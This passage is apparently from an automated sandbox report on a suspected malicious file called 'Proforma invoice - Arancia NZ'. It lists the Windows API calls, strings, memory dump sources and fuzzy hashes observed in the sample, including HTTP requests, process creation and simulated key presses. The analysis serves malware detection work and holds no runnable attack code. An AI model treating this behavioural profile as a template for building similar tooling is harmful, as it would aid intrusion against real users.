• Instruction Fuzzy Hash: 0461AD7092034AEFDB21CF64DD88DEEBBBCEB45384F544459E842A3251DB31AD29DB21
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002D6FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002D6FA8
• GetWindowLongW.USER32(?,000000F0), ref: 002D6FCC
• _memset.LIBCMT ref: 002D6FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002D6FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002D7067
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: cfaf2235a6806187c66e45336e35c63a4399e767471a531b7fcf1dfc439026b9
• Instruction ID: 1f2463ad3099a1d727fdaaea1e04157505f21785684a909d48f7eae7ed8d9b32
• Opcode Fuzzy Hash: cfaf2235a6806187c66e45336e35c63a4399e767471a531b7fcf1dfc439026b9
• Instruction Fuzzy Hash: B9617975A10209EFDB11DFA8CC81EEE77B8AB08710F10419AFA15AB3A1D775AD51CB90
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002A6BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 002A6C18
• VariantInit.OLEAUT32(?), ref: 002A6C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 002A6C4A
• VariantCopy.OLEAUT32(?,?), ref: 002A6C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 002A6CB1
• VariantClear.OLEAUT32(?), ref: 002A6CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 002A6CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A6CDC
• VariantClear.OLEAUT32(?), ref: 002A6CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002A6CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 81de9cb07179bbb78a866e052df802ec3bb8236a472b97d226d4ac05620d272a
• Instruction ID: 034b52d52ef777b15aac4fcb66325e40911456296e73527ea1af2c547c75cf76
• Opcode Fuzzy Hash: 81de9cb07179bbb78a866e052df802ec3bb8236a472b97d226d4ac05620d272a
• Instruction Fuzzy Hash: D1415F31E102199FCB00DF64D94C9AEBBB9EF09354F04806AE956A7261CB30AD55CFA4
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 002C5793
• inet_addr.WSOCK32(?,?,?), ref: 002C57D8
• gethostbyname.WSOCK32(?), ref: 002C57E4
• IcmpCreateFile.IPHLPAPI ref: 002C57F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002C5878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 002C58ED
• WSACleanup.WSOCK32 ref: 002C58F3
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 780f05ed35bc98fe1f419848b0e7b8588a845a2b229e786648faea6214c37e36
• Instruction ID: b9b970345fa6d102fced542fbec752845307903c827d7ee48b94925c78bf0302
• Opcode Fuzzy Hash: 780f05ed35bc98fe1f419848b0e7b8588a845a2b229e786648faea6214c37e36
• Instruction Fuzzy Hash: 08517C31620A119FDB10DF24DC49F2AB7E4AF48720F04862AF956DB2A1DB70EC94CF45
APIs
• SetErrorMode.KERNEL32(00000001), ref: 002BB4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002BB546
• GetLastError.KERNEL32 ref: 002BB550
• SetErrorMode.KERNEL32(00000000,READY), ref: 002BB5BD
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 31caae93737c0cfb3d6ac9607fe998af5f085a7f91a2e9968cf83b389d161abd
• Instruction ID: bae1e64afe9e9ae3df93fc367e6fb664f90d4cc6a20e57419541fe905cf83b00
• Opcode Fuzzy Hash: 31caae93737c0cfb3d6ac9607fe998af5f085a7f91a2e9968cf83b389d161abd
• Instruction Fuzzy Hash: 4431D435A20206DFCB22EF68CC45EFDB7B4FF08341F544026E90597291DBB09A56CB52
APIs
  • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
  • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002A9014
• GetDlgCtrlID.USER32 ref: 002A901F
• GetParent.USER32 ref: 002A903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 002A903E
• GetDlgCtrlID.USER32(?), ref: 002A9047
• GetParent.USER32(?), ref: 002A9063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 002A9066
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
  • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
  • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002A90FD
• GetDlgCtrlID.USER32 ref: 002A9108
• GetParent.USER32 ref: 002A9124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 002A9127
• GetDlgCtrlID.USER32(?), ref: 002A9130
• GetParent.USER32(?), ref: 002A914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 002A914F
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
• GetParent.USER32 ref: 002A916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 002A9184
• _wcscmp.LIBCMT ref: 002A9196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002A9211
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 002B7A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 002B11F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B1204
• GetWindowThreadProcessId.USER32(00000000), ref: 002B120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 002B122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B1245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0268,?,00000001), ref: 002B1257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B12B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002B0268,?,00000001), ref: 002B12BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0025FAA6
• OleUninitialize.OLE32(?,00000000), ref: 0025FB45
• UnregisterHotKey.USER32(?), ref: 0025FC9C
• DestroyWindow.USER32(?), ref: 002945D6
• FreeLibrary.KERNEL32(?), ref: 0029463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00294668
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,.$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-1389923024
APIs
• EnumChildWindows.USER32(?,002AA439), ref: 002AA377
                                                                                                                    Similarity
                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                    • Opcode ID: b099071cca02a6dec9cf3b80c4350d9c3d1cba17a798a393e2d8a1bd72363889
                                                                                                                    • Instruction ID: 2df1ab82a9bca1efda9e6450aee286ed4b0e8cacc0480122ab1d288493ae7301
                                                                                                                    • Opcode Fuzzy Hash: b099071cca02a6dec9cf3b80c4350d9c3d1cba17a798a393e2d8a1bd72363889
                                                                                                                    • Instruction Fuzzy Hash: 3291A630920606EBCB09DFA0C492BEEFB74BF05300F548119D959A7191DF7169B9DFA1
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00252EAE
                                                                                                                      • Part of subcall function 00251DB3: GetClientRect.USER32(?,?), ref: 00251DDC
                                                                                                                      • Part of subcall function 00251DB3: GetWindowRect.USER32(?,?), ref: 00251E1D
                                                                                                                      • Part of subcall function 00251DB3: ScreenToClient.USER32(?,?), ref: 00251E45
                                                                                                                    • GetDC.USER32 ref: 0028CD32
                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0028CD45
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0028CD53
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0028CD68
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0028CD70
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0028CDFB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                    • Opcode ID: 8a7add4a2181444a99adf9f7913cc0daea4abd046e10cd5ae3defae8b71e9c82
                                                                                                                    • Instruction ID: c341f52e1e3c86e00da2b5f04ce672f738478b2186f3ab4bbdf50913904dc419
                                                                                                                    • Opcode Fuzzy Hash: 8a7add4a2181444a99adf9f7913cc0daea4abd046e10cd5ae3defae8b71e9c82
                                                                                                                    • Instruction Fuzzy Hash: 0A710335421206DFCF21AF64C885AEA3BB5FF49321F24827AED555A2E6C7309C64DF60
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C1A50
                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002C1A7C
                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002C1ABE
                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002C1AD3
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C1AE0
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002C1B10
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 002C1B57
                                                                                                                      • Part of subcall function 002C2483: GetLastError.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C2498
                                                                                                                      • Part of subcall function 002C2483: SetEvent.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C24AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2603140658-3916222277
                                                                                                                    • Opcode ID: 572493ab8e910bd857dd30b834a69da3142f705069e05d3e29031fc62ddf8f1d
                                                                                                                    • Instruction ID: ae6e8e18138945254cd545c0ebe5cb009759f3c2028c801aeb3b8bf8304cb5a1
                                                                                                                    • Opcode Fuzzy Hash: 572493ab8e910bd857dd30b834a69da3142f705069e05d3e29031fc62ddf8f1d
                                                                                                                    • Instruction Fuzzy Hash: 684171B1911219BFEB119F50CC8AFFA77ACEF09354F04422AF9059A141EB709E649BA4
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,002DF910), ref: 002C8D28
                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002DF910), ref: 002C8D5C
                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002C8ED6
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 002C8F00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 560350794-0
                                                                                                                    • Opcode ID: 92bd456f62f7de817cc9dad5d700982106f8dd667e140a564ae6b1069b422d2e
                                                                                                                    • Instruction ID: d5dc4f6537e10afbf1afb2051a69e5747397f920e08582e75bdd08edce68c41c
                                                                                                                    • Opcode Fuzzy Hash: 92bd456f62f7de817cc9dad5d700982106f8dd667e140a564ae6b1069b422d2e
                                                                                                                    • Instruction Fuzzy Hash: D3F14971A10209EFCB04DF94C888EAEB7B9FF45315F108598F906AB251DB71AE95CF60
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002CF6B5
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CF848
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CF86C
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CF8AC
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CF8CE
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002CFA4A
                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002CFA7C
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002CFAAB
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002CFB22
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4090791747-0
                                                                                                                    • Opcode ID: 088ec9e6679778c15a978977b41544c34448965e36065247e1611d2498ab1dc1
                                                                                                                    • Instruction ID: 2403f9567f072a0ec8e29d77e1c0907fa43f3e25022aa90defa9920eebdbf885
                                                                                                                    • Opcode Fuzzy Hash: 088ec9e6679778c15a978977b41544c34448965e36065247e1611d2498ab1dc1
                                                                                                                    • Instruction Fuzzy Hash: 3BE1AF31624201DFCB54EF24C991F6ABBE1AF89354F148A6DF8998B2A1CB30DC55CF52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3697,?), ref: 002B468B
                                                                                                                      • Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3697,?), ref: 002B46A4
                                                                                                                      • Part of subcall function 002B4A31: GetFileAttributesW.KERNEL32(?,002B370B), ref: 002B4A32
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 002B4D40
                                                                                                                    • _wcscmp.LIBCMT ref: 002B4D5A
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 002B4D75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 793581249-0
                                                                                                                    • Opcode ID: 8669314bc19098f7fadb5207caad431675e80235ab07fc9fb513c27cea909a60
                                                                                                                    • Instruction ID: dc66de7d3ca52bf481eaeaee238ac98760a74a865105bf21fdec7eb1910fd7d6
                                                                                                                    • Opcode Fuzzy Hash: 8669314bc19098f7fadb5207caad431675e80235ab07fc9fb513c27cea909a60
                                                                                                                    • Instruction Fuzzy Hash: 8F5175B24183459BC724EF60D8919EFB3ECAF85350F00492EF589D3152EF74A698CB56
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002D86FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: 852d626bb08e57688abfdf46d8f29e0e96928eb2075f8b48aeb129faa896378e
                                                                                                                    • Instruction ID: 191e7bbfc60e44affab1e5ada6c7ec0445a4a734c64232edf5e199dcf6a96805
                                                                                                                    • Opcode Fuzzy Hash: 852d626bb08e57688abfdf46d8f29e0e96928eb2075f8b48aeb129faa896378e
                                                                                                                    • Instruction Fuzzy Hash: AE51A134620245BEEB209F28DC89FAD7B69EB05320F604153F951E63E0CB71EDA0DB85
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0028C2F7
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028C319
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0028C331
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0028C34F
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0028C370
                                                                                                                    • DestroyIcon.USER32(00000000), ref: 0028C37F
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0028C39C
                                                                                                                    • DestroyIcon.USER32(?), ref: 0028C3AB
                                                                                                                      • Part of subcall function 002DA4AF: DeleteObject.GDI32(00000000), ref: 002DA4E8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2819616528-0
                                                                                                                    • Opcode ID: 755a37149a1f35fcbb787640b991b88d59615908858cc5489265c6f0eb3e157b
                                                                                                                    • Instruction ID: 9d70a885e2b852b673e59cc0f985c6a2d19aac3f72f3888c405183b9ad021e51
                                                                                                                    • Opcode Fuzzy Hash: 755a37149a1f35fcbb787640b991b88d59615908858cc5489265c6f0eb3e157b
                                                                                                                    • Instruction Fuzzy Hash: 6351AB74A21206EFDB20EF24DC45FAA77A9EB49311F104529F902972E0D7B0ECA5DB64
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002AA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AA84C
                                                                                                                      • Part of subcall function 002AA82C: GetCurrentThreadId.KERNEL32 ref: 002AA853
                                                                                                                      • Part of subcall function 002AA82C: AttachThreadInput.USER32(00000000,?,002A9683,?,00000001), ref: 002AA85A
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A968E
                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002A96AB
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002A96AE
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A96B7
                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002A96D5
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002A96D8
                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 002A96E1
                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002A96F8
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002A96FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2014098862-0
                                                                                                                    • Opcode ID: 5deab1815638dc40b40258bc1942756301c95804b0d343491a247647a17ac98e
                                                                                                                    • Instruction ID: 6d226f227255975335ed7377e76848914e4ac5c1f409134c59c0ed99f67153a8
                                                                                                                    • Opcode Fuzzy Hash: 5deab1815638dc40b40258bc1942756301c95804b0d343491a247647a17ac98e
                                                                                                                    • Instruction Fuzzy Hash: EB11C271910218BFF6106B61AC4DF6A7B1DDF4D750F100426F655AB0A0C9F29C50DAA8
                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002A853C,00000B00,?,?), ref: 002A892A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A8931
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002A853C,00000B00,?,?), ref: 002A8946
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,002A853C,00000B00,?,?), ref: 002A894E
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A8951
                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002A853C,00000B00,?,?), ref: 002A8961
                                                                                                                    • GetCurrentProcess.KERNEL32(002A853C,00000000,?,002A853C,00000B00,?,?), ref: 002A8969
                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,002A853C,00000B00,?,?), ref: 002A896C
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,002A8992,00000000,00000000,00000000), ref: 002A8986
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 5838325f1fb1cced0414245c542c6aca419f9fe11e1b69494ec56a4f22981ccd
                                                                                                                    • Instruction ID: 3dfa093b84874a979c732c975b5b795382fda15e7fd8a7d1311de21fcdbbe738
